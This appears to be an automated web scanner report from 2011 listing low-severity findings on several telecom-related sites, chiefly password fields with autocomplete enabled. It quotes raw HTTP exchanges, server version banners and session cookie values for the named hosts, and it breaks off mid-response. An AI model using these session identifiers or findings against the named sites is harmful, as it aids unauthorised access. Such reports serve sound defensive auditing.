The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/US/afflpdc/index.php HTTP/1.1
Host: www.vonage.com
Proxy-Connection: keep-alive
Referer: http://www.vonage-forum.com/forum8.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: refer_id=AFLGN090801001W1; LP=1%7E%7E

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:50:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.8
Set-Cookie: LP=1%7E%7E; expires=Wed, 10-Aug-2011 00:50:30 GMT; path=/; domain=.vonage.com
Content-Type: text/html
Content-Length: 17336

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

14. Password field with autocomplete enabled  previous  next
There are 27 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


14.1. http://forum.link2voip.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forum.link2voip.com
Path:   /favicon.ico

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
Host: forum.link2voip.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phpbb3_82ha5_u=1; phpbb3_82ha5_k=; phpbb3_82ha5_sid=c8a27ebe829b8494c7b1d53ed606faba

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:45:01 GMT
Content-type: text/html; charset=UTF-8
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 39662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en
...[SNIP]...
<br />
   <form method="post" action="./ucp.php?mode=login">
   <table width="100%" border="0" cellpadding="0" cellspacing="0">
...[SNIP]...
</span> <input class="post" type="password" name="password" size="10" />&nbsp; <span class="gensmall">
...[SNIP]...

14.2. https://gvnwlnp.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://gvnwlnp.com
Path:   /login.aspx

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /login.aspx HTTP/1.1
Host: gvnwlnp.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=pf0wts55rdy2k0bdceo0lu45

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 00:50:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12113


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   LNP Login
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="ContainerControlColumn">
<input name="ctl00$ContentPlaceHolder1$Login1$Password" type="password" id="ctl00_ContentPlaceHolder1_Login1_Password" />
<span id="ctl00_ContentPlaceHolder1_Login1_PasswordRequired" title="Password is required." style="color:Red;visibility:hidden;">
...[SNIP]...

14.3. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://lnp.activationnow.com
Path:   /lnp/jsp/logon/login.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /lnp/jsp/logon/login.jsp;jsessionid=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413 HTTP/1.1
Host: lnp.activationnow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LNP=pabetaptel15p-lnp; JSESSIONID=qYpFNLnKf9fjDZKSkzRJcC5TnR1f7fVpwYdyvx2Q2sJRqJ1jTZD9!-1217543413

Response

HTTP/1.1 200 OK
Set-Cookie: LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT
Cache-Control: no-store
Date: Thu, 12 May 2011 00:50:20 GMT
Pragma: no-cache
Content-Length: 6277
Content-Type: text/html; charset=ISO-8859-1
Expires: Wed, 31 Dec 1969 23:59:59 GMT
X-Powered-By: Servlet/2.4 JSP/2.0


<html>
<!--
/*
* @(#)login.jsp 5/1/2001 11:55:44 AM
*
* Copyright 2001-2009 Synchronoss Technologies, Inc. 1525 Valley Center Parkway,
* Bethlehem, Pennsylvania, 18017, U.S.A. All Rights R
...[SNIP]...
<body>
<form action="j_security_check" method="post">
<!-- <form action="?action=login" method="post">
...[SNIP]...
<td class="logon-input" width="60%">
    <input type="password" name="j_password" size="20">
    </td>
...[SNIP]...

14.4. http://nanpa.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.5. http://nanpa.org/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:38 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 24631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.6. http://nanpa.org/about_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.7. http://nanpa.org/about_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /about_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /about_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:19 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.8. http://nanpa.org/awards_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /awards_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.9. http://nanpa.org/awards_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /awards_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /awards_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/education_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:01 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.10. http://nanpa.org/education_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /education_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.11. http://nanpa.org/education_overview.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /education_overview.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /education_overview.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/history.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:59 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 19905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.12. http://nanpa.org/history.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /history.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.13. http://nanpa.org/history.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nanpa.org
Path:   /history.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /history.php HTTP/1.1
Host: nanpa.org
Proxy-Connection: keep-alive
Referer: http://nanpa.org/about_overview.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsize=12

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:04:49 GMT
Server: Apache
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR NOR BUS UNI COM NAV INT", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 37882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
<div class="memlogin">
<form id="login" method="post" action="https://www.nanpa.org/members.php">
<table cellpadding="3" cellspacing="0" border="0" class="login_form">
...[SNIP]...
<td><input name="text2" type="password" size="10" class="login_box"/></td>
...[SNIP]...

14.14. https://support.connexon.com/sd/AddSolution.sd  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/AddSolution.sd

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sd/AddSolution.sd?solID=37 HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:56 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:55 GMT
Server: Apache-Coyote/1.1
Content-Length: 6546


<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="te
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.15. https://support.connexon.com/sd/Request.sd  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/Request.sd

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sd/Request.sd?mode=AddNew HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://support.connexon.com/sd/SolutionsHome.sd
Cookie: JSESSIONID=1CB498ABEDA80407FB8612A864D425DE; PREV_CONTEXT_PATH=/sd; JSESSIONID=8E7ACD94D937E2DF6367A9E55BD677BE

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:58 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:57 GMT
Server: Apache-Coyote/1.1
Content-Length: 12530


<link type="text/css" rel="stylesheet" href="/style/style.css?7607"/>
<link rel="SHORTCUT ICON" href="/images/favicon.ico"/>

<script>var isPortalEnabled = 'true';</script>
<link type="tex
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.16. https://support.connexon.com/sd/SolutionsHome.sd  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://support.connexon.com
Path:   /sd/SolutionsHome.sd

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /sd/SolutionsHome.sd HTTP/1.1
Host: support.connexon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.911enable.com/login/index.php

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd
X-Powered-By: Servlet 2.4; Tomcat-5.0.28/JBoss-3.2.6 (build: CVSTag=JBoss_3_2_6 date=200410140106)
Set-Cookie: PREV_CONTEXT_PATH=/sd; Expires=Fri, 13-May-2011 01:08:08 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 01:08:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 13742


<html>
<link type="text/css" rel="stylesheet" href="../style/style.css?aa">
<link type="text/css" rel="stylesheet" href="../style/demo.css">
<link rel="SHORTCUT ICON" hre
...[SNIP]...
<div id="PortalContRight" style="float:right;">
               
                   <form action="/HomePage.do?fromCustomer=customerportal" method="post" name='login'>    
                   
                   <table cellpadding="5" cellspacing="1pt" bgcolor="#cfcfcf" border="0" width="100%" align="center" >
...[SNIP]...
<td align="center"><input name="password" type="password" class="formStyle" style="width:90%;" > </td>
...[SNIP]...

14.17. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://support.sprint.com
Path:   /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 HTTP/1.1
Host: support.sprint.com
Proxy-Connection: keep-alive
Referer: http://shop2.sprint.com/en/support/faq/wlnp.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:04 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: Apache=173.193.214.243.1305161164637776; path=/
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP05 (build: SVNTag=JBPAPP_4_2_0_GA_CP05 date=200810231548)/JBossWeb-2.0
Set-Cookie: JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
X-ATG-Version: version=QVRHUGxhdGZvcm0vOS4xLFByb2plY3RJbnN0YWxsLzkuMCBbIERQU0xpY2Vuc2UvMCBCMkJMaWNlbnNlLzAgIF0=
